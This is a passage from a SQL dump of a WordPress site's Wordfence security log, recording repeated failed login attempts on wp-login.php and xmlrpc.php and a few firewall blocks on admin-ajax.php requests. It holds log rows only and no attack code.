Firefox/62.0','loginFailValidUsername',NULL,NULL),(5961,0.000000,1629301105.269152,'\0\0\0\0\0\0\0\0\0\0����q�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(5962,0.000000,1629301271.299663,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5963,0.000000,1629301683.463280,'\0\0\0\0\0\0\0\0\0\0�����\n',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5964,0.000000,1629301874.569439,'\0\0\0\0\0\0\0\0\0\0��-�A*',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5965,0.000000,1629302081.576974,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5966,0.000000,1629302430.757028,'\0\0\0\0\0\0\0\0\0\0���ѓ<',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5967,0.000000,1629302637.249097,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5968,0.000000,1629302865.650903,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5969,0.000000,1629303262.763304,'\0\0\0\0\0\0\0\0\0\0��+�Hu',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5970,0.000000,1629303396.550498,'\0\0\0\0\0\0\0\0\0\0��r!Z',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','loginFailValidUsername',NULL,NULL),(5971,0.000000,1629303642.022284,'\0\0\0\0\0\0\0\0\0\0��P��F',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5972,0.000000,1629304059.985984,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5973,0.000000,1629304154.556162,'\0\0\0\0\0\0\0\0\0\0��g�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','loginFailValidUsername',NULL,NULL),(5974,0.000000,1629304447.986275,'\0\0\0\0\0\0\0\0\0\0���B�r',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5975,0.000000,1629304831.705814,'\0\0\0\0\0\0\0\0\0\0��g��E',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5976,0.000000,1629305215.620678,'\0\0\0\0\0\0\0\0\0\0����l�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5977,0.000000,1629305539.090580,'\0\0\0\0\0\0\0\0\0\0��@�D�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5978,0.000000,1629305691.069156,'\0\0\0\0\0\0\0\0\0\0��%a��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','loginFailValidUsername',NULL,NULL),(5979,0.000000,1629306455.707839,'\0\0\0\0\0\0\0\0\0\0���A�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','loginFailValidUsername',NULL,NULL),(5980,0.000000,1629307223.453729,'\0\0\0\0\0\0\0\0\0\0��M��)',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','loginFailValidUsername',NULL,NULL),(5981,0.000000,1629307982.397595,'\0\0\0\0\0\0\0\0\0\0�����B',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5982,0.000000,1629308741.561093,'\0\0\0\0\0\0\0\0\0\0��R�,�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5983,0.000000,1629309506.122735,'\0\0\0\0\0\0\0\0\0\0���Z�w',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(5984,0.000000,1629311030.477095,'\0\0\0\0\0\0\0\0\0\0��_�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5985,0.000000,1629311783.100788,'\0\0\0\0\0\0\0\0\0\0��>��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5986,0.000000,1629312544.350817,'\0\0\0\0\0\0\0\0\0\0����\n',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5987,0.000000,1629314090.018723,'\0\0\0\0\0\0\0\0\0\0���捫',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5988,0.000000,1629314864.414788,'\0\0\0\0\0\0\0\0\0\0����-%',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5989,0.000000,1629316407.603190,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','loginFailValidUsername',NULL,NULL),(5990,0.000000,1629317178.535462,'\0\0\0\0\0\0\0\0\0\0���;�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','loginFailValidUsername',NULL,NULL),(5991,0.000000,1629317950.761457,'\0\0\0\0\0\0\0\0\0\0���wң',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5992,0.000000,1629318718.760254,'\0\0\0\0\0\0\0\0\0\0����e�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','loginFailValidUsername',NULL,NULL),(5993,0.000000,1629319487.578390,'\0\0\0\0\0\0\0\0\0\0��e ��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','loginFailValidUsername',NULL,NULL),(5994,0.000000,1629320255.477823,'\0\0\0\0\0\0\0\0\0\0���옔',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5995,0.000000,1629321809.818290,'\0\0\0\0\0\0\0\0\0\0��>��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5996,0.000000,1629322595.603230,'\0\0\0\0\0\0\0\0\0\0��_�� ',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5997,0.000000,1629323374.366488,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5998,0.000000,1629324152.662631,'\0\0\0\0\0\0\0\0\0\0��3Kȷ',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5999,0.000000,1629326501.451118,'\0\0\0\0\0\0\0\0\0\0���捫',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6000,0.000000,1629327128.651423,'\0\0\0\0\0\0\0\0\0\0��#�v',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','loginFailValidUsername',NULL,NULL),(6001,0.000000,1629328691.245511,'\0\0\0\0\0\0\0\0\0\0���Vҳ',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6002,0.000000,1629329480.451322,'\0\0\0\0\0\0\0\0\0\0��-�A*',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','loginFailValidUsername',NULL,NULL),(6003,0.000000,1629330269.219371,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','loginFailValidUsername',NULL,NULL),(6004,0.000000,1629331064.350570,'\0\0\0\0\0\0\0\0\0\0����}',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6005,0.000000,1629331874.469436,'\0\0\0\0\0\0\0\0\0\0���#t;',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6006,0.000000,1629332665.932398,'\0\0\0\0\0\0\0\0\0\0���D��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6007,0.000000,1629333470.023357,'\0\0\0\0\0\0\0\0\0\0��g�ڲ',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6008,0.000000,1629334282.816793,'\0\0\0\0\0\0\0\0\0\0�����_',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6009,0.000000,1629335097.781544,'\0\0\0\0\0\0\0\0\0\0��-(��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','loginFailValidUsername',NULL,NULL),(6010,0.000000,1629335908.345194,'\0\0\0\0\0\0\0\0\0\0��mW�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','loginFailValidUsername',NULL,NULL),(6011,0.000000,1629336721.836563,'\0\0\0\0\0\0\0\0\0\0�����^',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6012,0.000000,1629337519.510046,'\0\0\0\0\0\0\0\0\0\0����o',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6013,0.000000,1629339145.946139,'\0\0\0\0\0\0\0\0\0\0��QEˣ',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6014,0.000000,1629340793.853751,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6015,0.000000,1629341621.521971,'\0\0\0\0\0\0\0\0\0\0��ν',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','loginFailValidUsername',NULL,NULL),(6016,0.000000,1629343223.709236,'\0\0\0\0\0\0\0\0\0\0��P�Ҕ',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6017,0.000000,1629344006.482053,'\0\0\0\0\0\0\0\0\0\0���75�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6018,0.000000,1629344782.623750,'\0\0\0\0\0\0\0\0\0\0���]n\'',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6019,0.000000,1629345539.464896,'\0\0\0\0\0\0\0\0\0\0��H�*',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','loginFailValidUsername',NULL,NULL),(6020,0.000000,1629345891.623622,'\0\0\0\0\0\0\0\0\0\0��>Ҵ�',0,503,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6021,0.000000,1629346298.989001,'\0\0\0\0\0\0\0\0\0\0��t��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36','loginFailValidUsername',NULL,NULL),(6022,0.000000,1629347807.571754,'\0\0\0\0\0\0\0\0\0\0����8�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6023,0.000000,1629348547.441102,'\0\0\0\0\0\0\0\0\0\0��\"W#�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','loginFailValidUsername',NULL,NULL),(6024,0.000000,1629349268.517423,'\0\0\0\0\0\0\0\0\0\0��o]5�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','loginFailValidUsername',NULL,NULL),(6025,0.000000,1629349992.544254,'\0\0\0\0\0\0\0\0\0\0���Z�_',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6026,0.000000,1629350718.125005,'\0\0\0\0\0\0\0\0\0\0����g$',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','loginFailValidUsername',NULL,NULL),(6027,1629350747.820441,1629350747.467900,'\0\0\0\0\0\0\0\0\0\0��[ySC',0,403,0,0,0,'https://www.equalitywalk.org.uk//wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','blocked:waf','WAF-RULE-328','{\"learningMode\":0,\"failedRules\":\"328\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"Ly9ob21lL2VxdWFsaXR5d2Fsay5vcmcudWsvcHVibGljX2h0bWwvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"Ly93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"category\":\"bypass\",\"ssl\":1}'),(6028,1629350756.920717,1629350756.614000,'\0\0\0\0\0\0\0\0\0\0��[ySC',0,403,0,0,0,'https://www.equalitywalk.org.uk//wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','blocked:waf','Modern WPBakery Page Builder Addons <= 3.0.1 Unprotected AJAX Actions','{\"learningMode\":0,\"failedRules\":\"362\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"Ly9ob21lL2VxdWFsaXR5d2Fsay5vcmcudWsvcHVibGljX2h0bWwvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"Ly93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"category\":\"bypass\",\"ssl\":1}'),(6029,0.000000,1629351444.329285,'\0\0\0\0\0\0\0\0\0\0��#�,&',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6030,0.000000,1629352176.978230,'\0\0\0\0\0\0\0\0\0\0��ٮ�i',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','loginFailValidUsername',NULL,NULL),(6031,0.000000,1629352914.184195,'\0\0\0\0\0\0\0\0\0\0��Ո]�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6032,0.000000,1629353656.464746,'\0\0\0\0\0\0\0\0\0\0��_�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6033,0.000000,1629354390.057550,'\0\0\0\0\0\0\0\0\0\0���7o',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6034,0.000000,1629355129.913256,'\0\0\0\0\0\0\0\0\0\0��vE��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6035,0.000000,1629355875.551361,'\0\0\0\0\0\0\0\0\0\0���]�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6036,0.000000,1629356624.389171,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6037,0.000000,1629357367.321685,'\0\0\0\0\0\0\0\0\0\0��/� ',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','loginFailValidUsername',NULL,NULL),(6038,0.000000,1629358079.508557,'\0\0\0\0\0\0\0\0\0\0��h%��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6039,0.000000,1629358112.959441,'\0\0\0\0\0\0\0\0\0\0���;Rz',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','loginFailValidUsername',NULL,NULL),(6040,0.000000,1629358341.320044,'\0\0\0\0\0\0\0\0\0\0��@Z0h',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6041,0.000000,1629358590.997966,'\0\0\0\0\0\0\0\0\0\0��m�\Z',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6042,0.000000,1629358808.526512,'\0\0\0\0\0\0\0\0\0\0���@r',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6043,0.000000,1629358859.879656,'\0\0\0\0\0\0\0\0\0\0��#��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','loginFailValidUsername',NULL,NULL),(6044,0.000000,1629359060.491194,'\0\0\0\0\0\0\0\0\0\0���@r',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6045,0.000000,1629359336.771615,'\0\0\0\0\0\0\0\0\0\0���,�7',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6046,0.000000,1629359446.266464,'\0\0\0\0\0\0\0\0\0\0��Z��',0,200,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 